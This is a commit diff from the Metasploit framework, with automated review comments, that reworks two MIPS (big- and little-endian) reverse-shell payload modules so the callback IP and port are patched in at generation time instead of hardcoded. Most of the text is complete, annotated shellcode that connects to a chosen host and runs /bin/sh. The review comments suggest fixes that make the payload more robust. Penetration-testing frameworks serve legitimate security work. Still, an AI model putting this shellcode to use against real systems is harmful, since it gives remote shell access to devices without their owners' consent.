Fixes #5581: Stop hardcoding MIPS reverse shell IP/port
git-svn-id: file:///home/svn/framework3/trunk@13999 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
4209431355
commit
ac916baac5
|
@ -35,41 +35,99 @@ module Metasploit3
|
|||
'Session' => Msf::Sessions::CommandShellUnix,
|
||||
'Payload' =>
|
||||
{
|
||||
'Offsets' =>
|
||||
{
|
||||
# FIXME: LHOST does'nt patch anything real, host is fixed to 192.168.1.9
|
||||
# Get shellcode with String.cpu=Metasm::MIPS.new
|
||||
# sc.decode
|
||||
# (but Metasploit's version is buggy)
|
||||
# We need to patch this: (C0A80109 = 192.168.1.9)
|
||||
# lui $t0, -3f58h ; @4ch 3c08c0a8
|
||||
# ori $a2, $t0, 109h ; @50h 35060109
|
||||
'LHOST' => [ 0x130, 'ADDR' ],
|
||||
'LPORT' => [ 0x5E, 'n' ],
|
||||
},
|
||||
'Payload' =>
|
||||
"\x24\x09\xff\xef\x05\x10\xff\xff\x28\x08\x82\x82\x01\x20\x48\x27" +
|
||||
"\x01\x3f\xc8\x21\xaf\xb9\x85\x48\x23\xb9\x85\x48\x3c\x1c\x00\x00" +
|
||||
"\x27\x9c\x00\x00\x03\x99\xe0\x21\x27\xbd\xff\xd0\xaf\xbc\x00\x00" +
|
||||
"\xaf\xbc\x00\x28\x8f\x84\x00\x00\x00\x00\x00\x00\x24\x84\x00\xf8" +
|
||||
"\x00\x00\x00\x00\x8c\x85\x00\x00\x8c\x87\x00\x04\x3c\x08\xc0\xa8" +
|
||||
"\x35\x06\x01\x09\x27\xb9\x00\x18\x24\x03\x00\x02\x24\x02\x12\x26" +
|
||||
"\xaf\xa5\x00\x18\xaf\xa6\x00\x0c\xaf\xa7\x00\x1c\xa7\xa3\x00\x08" +
|
||||
"\xa7\xa2\x00\x0a\xaf\xb9\x00\x20\xaf\xa0\x00\x24\x24\x04\x00\x02" +
|
||||
"\x24\x05\x00\x02\x00\x00\x30\x21\x24\x02\x10\x57\x00\x00\x00\x0c" +
|
||||
"\x24\x04\xff\xff\x10\x44\x00\x1a\x00\x40\x18\x21\x00\x60\x20\x21" +
|
||||
"\x24\x06\x00\x10\x27\xa5\x00\x08\x24\x02\x10\x4a\x00\x00\x00\x0c" +
|
||||
"\x14\x40\x00\x0e\x00\x00\x28\x21\x24\x02\x0f\xdf\x00\x00\x00\x0c" +
|
||||
"\x24\x05\x00\x01\x24\x02\x0f\xdf\x00\x00\x00\x0c\x24\x05\x00\x02" +
|
||||
"\x24\x02\x0f\xdf\x00\x00\x00\x0c\x03\x20\x20\x21\x27\xa5\x00\x20" +
|
||||
"\x00\x00\x30\x21\x24\x02\x0f\xab\x00\x00\x00\x0c\x00\x00\x20\x21" +
|
||||
"\x24\x02\x0f\xa1\x00\x00\x00\x0c\x03\xe0\x00\x08\x27\xbd\x00\x30" +
|
||||
"\x24\x04\x00\x01\x24\x02\x0f\xa1\x00\x00\x00\x0c\x10\x00\xff\xe4" +
|
||||
"\x00\x60\x20\x21\x2f\x62\x69\x6e\x2f\x73\x68\x00"+"0"*80
|
||||
'Offsets' => { },
|
||||
'Payload' => ''
|
||||
})
|
||||
)
|
||||
end
|
||||
|
||||
def generate
|
||||
if( !datastore['LHOST'] or datastore['LHOST'].empty? )
|
||||
return super
|
||||
end
|
||||
|
||||
host = Rex::Socket.addr_atoi(datastore['LHOST'])
|
||||
port = Integer(datastore['LPORT'])
|
||||
|
||||
host = [host].pack("N").unpack("cccc")
|
||||
port = [port].pack("n").unpack("cc")
|
||||
|
||||
shellcode =
|
||||
"\x24\x09\xff\xef" + # li t1,-17
|
||||
"\x05\x10\xff\xff" + # bltzal t0,0x4
|
||||
"\x28\x08\x82\x82" + # slti t0,zero,-32126
|
||||
"\x01\x20\x48\x27" + # nor t1,t1,zero
|
||||
"\x01\x3f\xc8\x21" + # addu t9,t1,ra
|
||||
"\xaf\xb9\x85\x48" + # sw t9,-31416(sp)
|
||||
"\x23\xb9\x85\x48" + # addi t9,sp,-31416
|
||||
"\x3c\x1c\x00\x00" + # lui gp,0x0
|
||||
"\x27\x9c\x00\x00" + # addiu gp,gp,0
|
||||
"\x03\x99\xe0\x21" + # addu gp,gp,t9
|
||||
"\x27\xbd\xff\xd0" + # addiu sp,sp,-48
|
||||
"\xaf\xbc\x00\x00" + # sw gp,0(sp)
|
||||
"\xaf\xbc\x00\x28" + # sw gp,40(sp)
|
||||
"\x8f\x84\x00\x00" + # lw a0,0(gp)
|
||||
"\x00\x00\x00\x00" + # nop
|
||||
"\x24\x84\x00\xf8" + # addiu a0,a0,248
|
||||
"\x00\x00\x00\x00" + # nop
|
||||
"\x8c\x85\x00\x00" + # lw a1,0(a0)
|
||||
"\x8c\x87\x00\x04" + # lw a3,4(a0)
|
||||
"\x3c\x08" + host[0..1].pack("C2") + # lui t0,0xc0a8
|
||||
"\x35\x06" + host[2..3].pack("C2") + # ori a2,t0,0x109
|
||||
"\x27\xb9\x00\x18" + # addiu t9,sp,24
|
||||
"\x24\x03\x00\x02" + # li v1,2
|
||||
"\x24\x02" + port.pack("C2") + # li v0,4646
|
||||
"\xaf\xa5\x00\x18" + # sw a1,24(sp)
|
||||
"\xaf\xa6\x00\x0c" + # sw a2,12(sp)
|
||||
"\xaf\xa7\x00\x1c" + # sw a3,28(sp)
|
||||
"\xa7\xa3\x00\x08" + # sh v1,8(sp)
|
||||
"\xa7\xa2\x00\x0a" + # sh v0,10(sp)
|
||||
"\xaf\xb9\x00\x20" + # sw t9,32(sp)
|
||||
"\xaf\xa0\x00\x24" + # sw zero,36(sp)
|
||||
"\x24\x04\x00\x02" + # li a0,2
|
||||
"\x24\x05\x00\x02" + # li a1,2
|
||||
"\x00\x00\x30\x21" + # move a2,zero
|
||||
"\x24\x02\x10\x57" + # li v0,4183
|
||||
"\x00\x00\x00\x0c" + # syscall
|
||||
"\x24\x04\xff\xff" + # li a0,-1
|
||||
"\x10\x44\x00\x1a" + # beq v0,a0,0x100
|
||||
"\x00\x40\x18\x21" + # move v1,v0
|
||||
"\x00\x60\x20\x21" + # move a0,v1
|
||||
"\x24\x06\x00\x10" + # li a2,16
|
||||
"\x27\xa5\x00\x08" + # addiu a1,sp,8
|
||||
"\x24\x02\x10\x4a" + # li v0,4170
|
||||
"\x00\x00\x00\x0c" + # syscall
|
||||
"\x14\x40\x00\x0e" + # bnez v0,0xec
|
||||
"\x00\x00\x28\x21" + # move a1,zero
|
||||
"\x24\x02\x0f\xdf" + # li v0,4063
|
||||
"\x00\x00\x00\x0c" + # syscall
|
||||
"\x24\x05\x00\x01" + # li a1,1
|
||||
"\x24\x02\x0f\xdf" + # li v0,4063
|
||||
"\x00\x00\x00\x0c" + # syscall
|
||||
"\x24\x05\x00\x02" + # li a1,2
|
||||
"\x24\x02\x0f\xdf" + # li v0,4063
|
||||
"\x00\x00\x00\x0c" + # syscall
|
||||
"\x03\x20\x20\x21" + # move a0,t9
|
||||
"\x27\xa5\x00\x20" + # addiu a1,sp,32
|
||||
"\x00\x00\x30\x21" + # move a2,zero
|
||||
"\x24\x02\x0f\xab" + # li v0,4011
|
||||
"\x00\x00\x00\x0c" + # syscall
|
||||
"\x00\x00\x20\x21" + # move a0,zero
|
||||
"\x24\x02\x0f\xa1" + # li v0,4001
|
||||
"\x00\x00\x00\x0c" + # syscall
|
||||
"\x03\xe0\x00\x08" + # jr ra
|
||||
"\x27\xbd\x00\x30" + # addiu sp,sp,48
|
||||
"\x24\x04\x00\x01" + # li a0,1
|
||||
"\x24\x02\x0f\xa1" + # li v0,4001
|
||||
"\x00\x00\x00\x0c" + # syscall
|
||||
"\x10\x00\xff\xe4" + # b 0xa0
|
||||
"\x00\x60\x20\x21" + # move a0,v1
|
||||
"\x2f\x62\x69\x6e" + # "/bin"
|
||||
"\x2f\x73\x68\x00" + # "/sh\x00"
|
||||
"0"*80
|
||||
# FIXME: remove extra 0 bytes!
|
||||
|
||||
}
|
||||
))
|
||||
return super + shellcode
|
||||
end
|
||||
|
||||
end
|
||||
|
|
|
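Review bot: The early `return super` in `generate` when LHOST is blank now yields an empty payload, because the blob it falls back to is the new `'Payload' => ''`; a zero-length payload should be an error rather than a silent result, e.g. `raise ArgumentError, 'LHOST must be set for this payload'` in place of `return super` (if the framework guarantees LHOST for reverse payloads, a comment saying so would do instead). The octet extraction works only because `pack('C')` wraps the negative values that `unpack('cccc')` produces for octets >= 0x80, which is every 192.168.x.x address; `host = [host].pack('N').unpack('C4')` and `port = [port].pack('n').unpack('C2')` state the intent and avoid relying on that wrap. The disassembly comments on the patched instructions still carry the old constants and will mislead the next reader: I would change them to `# lui t0, hi16(LHOST)`, `# ori a2, t0, lo16(LHOST)` and `# li v0, LPORT (big-endian, stored by sh below)`. Note also that `"0"*80` appends 80 ASCII '0' bytes (0x30), not NUL padding, so the carried-over FIXME on that line should say so if the padding is kept for now.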
@ -35,40 +35,92 @@ module Metasploit3
|
|||
'Session' => Msf::Sessions::CommandShellUnix,
|
||||
'Payload' =>
|
||||
{
|
||||
'Offsets' =>
|
||||
{
|
||||
# FIXME: LHOST does'nt patch anything real, host is fixed to 192.168.1.9
|
||||
# Get shellcode with String.cpu=Metasm::MIPS.new
|
||||
# sc.decode
|
||||
# (but Metasploit's version is buggy)
|
||||
# We need to patch this: (C0A80109 = 192.168.1.9)
|
||||
# lui $t0, -3f58h ; @4ch 3c08c0a8
|
||||
# ori $a2, $t0, 109h ; @50h 35060109
|
||||
'LHOST' => [ 0x130, 'ADDR' ],
|
||||
'LPORT' => [ 0x4C, 'n' ],
|
||||
},
|
||||
'Payload' =>
|
||||
"\xef\xff\x09\x24\xff\xff\x10\x05\x82\x82\x08\x28\x27\x48\x20\x01" +
|
||||
"\x21\xc8\x3f\x01\x48\x85\xb9\xaf\x48\x85\xb9\x23\x00\x00\x1c\x3c" +
|
||||
"\x00\x00\x9c\x27\x21\xe0\x99\x03\x00\x00\x89\x8f\xd8\xff\xbd\x27" +
|
||||
"\xe8\x00\x2a\x25\x04\x00\x47\x8d\xe8\x00\x28\x8d\x01\x09\x04\x3c" +
|
||||
"\xc0\xa8\x83\x34\x18\x00\xb9\x27\x02\x00\x06\x24\x12\x26\x05\x24" +
|
||||
"\x08\x00\xa6\xa7\x0a\x00\xa5\xa7\x18\x00\xa8\xaf\x1c\x00\xa7\xaf" +
|
||||
"\x0c\x00\xa3\xaf\x20\x00\xb9\xaf\x24\x00\xa0\xaf\x02\x00\x04\x24" +
|
||||
"\x02\x00\x05\x24\x21\x30\x00\x00\x57\x10\x02\x24\x0c\x00\x00\x00" +
|
||||
"\x21\x18\x40\x00\xff\xff\x02\x24\x1a\x00\x62\x10\x01\x00\x04\x24" +
|
||||
"\x21\x20\x60\x00\x08\x00\xa5\x27\x10\x00\x06\x24\x4a\x10\x02\x24" +
|
||||
"\x0c\x00\x00\x00\x0e\x00\x40\x14\x21\x28\x00\x00\xdf\x0f\x02\x24" +
|
||||
"\x0c\x00\x00\x00\x01\x00\x05\x24\xdf\x0f\x02\x24\x0c\x00\x00\x00" +
|
||||
"\x02\x00\x05\x24\xdf\x0f\x02\x24\x0c\x00\x00\x00\x21\x30\x00\x00" +
|
||||
"\x21\x20\x20\x03\x20\x00\xa5\x27\xab\x0f\x02\x24\x0c\x00\x00\x00" +
|
||||
"\x21\x20\x00\x00\xa1\x0f\x02\x24\x0c\x00\x00\x00\x08\x00\xe0\x03" +
|
||||
"\x28\x00\xbd\x27\xa1\x0f\x02\x24\x0c\x00\x00\x00\xe5\xff\x00\x10" +
|
||||
"\x21\x20\x60\x00\x2f\x62\x69\x6e\x2f\x73\x68\x00"+"0"*80
|
||||
# FIXME: remove extra 0 bytes!
|
||||
'Offsets' => { },
|
||||
'Payload' => ''
|
||||
})
|
||||
)
|
||||
end
|
||||
|
||||
}
|
||||
))
|
||||
def generate
|
||||
if( !datastore['LHOST'] or datastore['LHOST'].empty? )
|
||||
return super
|
||||
end
|
||||
|
||||
host = Rex::Socket.addr_atoi(datastore['LHOST'])
|
||||
port = Integer(datastore['LPORT'])
|
||||
|
||||
host = [host].pack("N").unpack("cccc")
|
||||
port = [port].pack("n").unpack("cc")
|
||||
|
||||
shellcode =
|
||||
"\xef\xff\x09\x24" + # li t1,-17
|
||||
"\xff\xff\x10\x05" + # bltzal t0,0x4
|
||||
"\x82\x82\x08\x28" + # slti t0,zero,-32126
|
||||
"\x27\x48\x20\x01" + # nor t1,t1,zero
|
||||
"\x21\xc8\x3f\x01" + # addu t9,t1,ra
|
||||
"\x48\x85\xb9\xaf" + # sw t9,-31416(sp)
|
||||
"\x48\x85\xb9\x23" + # addi t9,sp,-31416
|
||||
"\x00\x00\x1c\x3c" + # lui gp,0x0
|
||||
"\x00\x00\x9c\x27" + # addiu gp,gp,0
|
||||
"\x21\xe0\x99\x03" + # addu gp,gp,t9
|
||||
"\x00\x00\x89\x8f" + # lw t1,0(gp)
|
||||
"\xd8\xff\xbd\x27" + # addiu sp,sp,-40
|
||||
"\xe8\x00\x2a\x25" + # addiu t2,t1,232
|
||||
"\x04\x00\x47\x8d" + # lw a3,4(t2)
|
||||
"\xe8\x00\x28\x8d" + # lw t0,232(t1)
|
||||
host[2..3].pack("C2") + "\x04\x3c" + # lui a0,0x901
|
||||
host[0..1].pack("C2") + "\x83\x34" + # ori v1,a0,0xa8c0
|
||||
"\x18\x00\xb9\x27" + # addiu t9,sp,24
|
||||
"\x02\x00\x06\x24" + # li a2,2
|
||||
port.pack("C2") + "\x05\x24" + # li a1,9746
|
||||
"\x08\x00\xa6\xa7" + # sh a2,8(sp)
|
||||
"\x0a\x00\xa5\xa7" + # sh a1,10(sp)
|
||||
"\x18\x00\xa8\xaf" + # sw t0,24(sp)
|
||||
"\x1c\x00\xa7\xaf" + # sw a3,28(sp)
|
||||
"\x0c\x00\xa3\xaf" + # sw v1,12(sp)
|
||||
"\x20\x00\xb9\xaf" + # sw t9,32(sp)
|
||||
"\x24\x00\xa0\xaf" + # sw zero,36(sp)
|
||||
"\x02\x00\x04\x24" + # li a0,2
|
||||
"\x02\x00\x05\x24" + # li a1,2
|
||||
"\x21\x30\x00\x00" + # move a2,zero
|
||||
"\x57\x10\x02\x24" + # li v0,4183
|
||||
"\x0c\x00\x00\x00" + # syscall
|
||||
"\x21\x18\x40\x00" + # move v1,v0
|
||||
"\xff\xff\x02\x24" + # li v0,-1
|
||||
"\x1a\x00\x62\x10" + # beq v1,v0,0xf4
|
||||
"\x01\x00\x04\x24" + # li a0,1
|
||||
"\x21\x20\x60\x00" + # move a0,v1
|
||||
"\x08\x00\xa5\x27" + # addiu a1,sp,8
|
||||
"\x10\x00\x06\x24" + # li a2,16
|
||||
"\x4a\x10\x02\x24" + # li v0,4170
|
||||
"\x0c\x00\x00\x00" + # syscall
|
||||
"\x0e\x00\x40\x14" + # bnez v0,0xe0
|
||||
"\x21\x28\x00\x00" + # move a1,zero
|
||||
"\xdf\x0f\x02\x24" + # li v0,4063
|
||||
"\x0c\x00\x00\x00" + # syscall
|
||||
"\x01\x00\x05\x24" + # li a1,1
|
||||
"\xdf\x0f\x02\x24" + # li v0,4063
|
||||
"\x0c\x00\x00\x00" + # syscall
|
||||
"\x02\x00\x05\x24" + # li a1,2
|
||||
"\xdf\x0f\x02\x24" + # li v0,4063
|
||||
"\x0c\x00\x00\x00" + # syscall
|
||||
"\x21\x30\x00\x00" + # move a2,zero
|
||||
"\x21\x20\x20\x03" + # move a0,t9
|
||||
"\x20\x00\xa5\x27" + # addiu a1,sp,32
|
||||
"\xab\x0f\x02\x24" + # li v0,4011
|
||||
"\x0c\x00\x00\x00" + # syscall
|
||||
"\x21\x20\x00\x00" + # move a0,zero
|
||||
"\xa1\x0f\x02\x24" + # li v0,4001
|
||||
"\x0c\x00\x00\x00" + # syscall
|
||||
"\x08\x00\xe0\x03" + # jr ra
|
||||
"\x28\x00\xbd\x27" + # addiu sp,sp,40
|
||||
"\xa1\x0f\x02\x24" + # li v0,4001
|
||||
"\x0c\x00\x00\x00" + # syscall
|
||||
"\xe5\xff\x00\x10" + # b 0x94
|
||||
"\x21\x20\x60\x00" + # move a0,v1
|
||||
"\x2f\x62\x69\x6e" + # "/bin"
|
||||
"\x2f\x73\x68\x00" + # "/sh\x00"
|
||||
"0"*80
|
||||
end
|
||||
|
||||
end
|
||||
|
|
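Review bot: The byte placement in this little-endian `generate` is correct but looks backwards at first glance — `host[2..3].pack("C2") + "\x04\x3c"` puts the network-order octets into the low immediate of a LE-encoded `lui`, and `port.pack("C2") + "\x05\x24"` likewise loads the byte-swapped port — so each of those lines deserves a comment such as `# imm holds the octets in network order; sw/sh store LE, so memory ends up big-endian`, replacing the stale `# lui a0,0x901`, `# ori v1,a0,0xa8c0` and `# li a1,9746` taken from the hardcoded 192.168.1.9:4646 build. This file's `generate` returns the shellcode directly while the big-endian sibling in this commit returns `super + shellcode`; both produce the same bytes now that `'Payload' => ''`, but the two should agree, and the `return super` fallback for a blank LHOST returns an empty string here as well, which is better raised as an error than emitted. As in the other file, `unpack("cccc")`/`unpack("cc")` rely on `pack("C2")` wrapping negative octets; `unpack("C4")` and `unpack("C2")` are the clearer form. The trailing `"0"*80` is ASCII '0' padding rather than NUL bytes, which the inherited FIXME does not say.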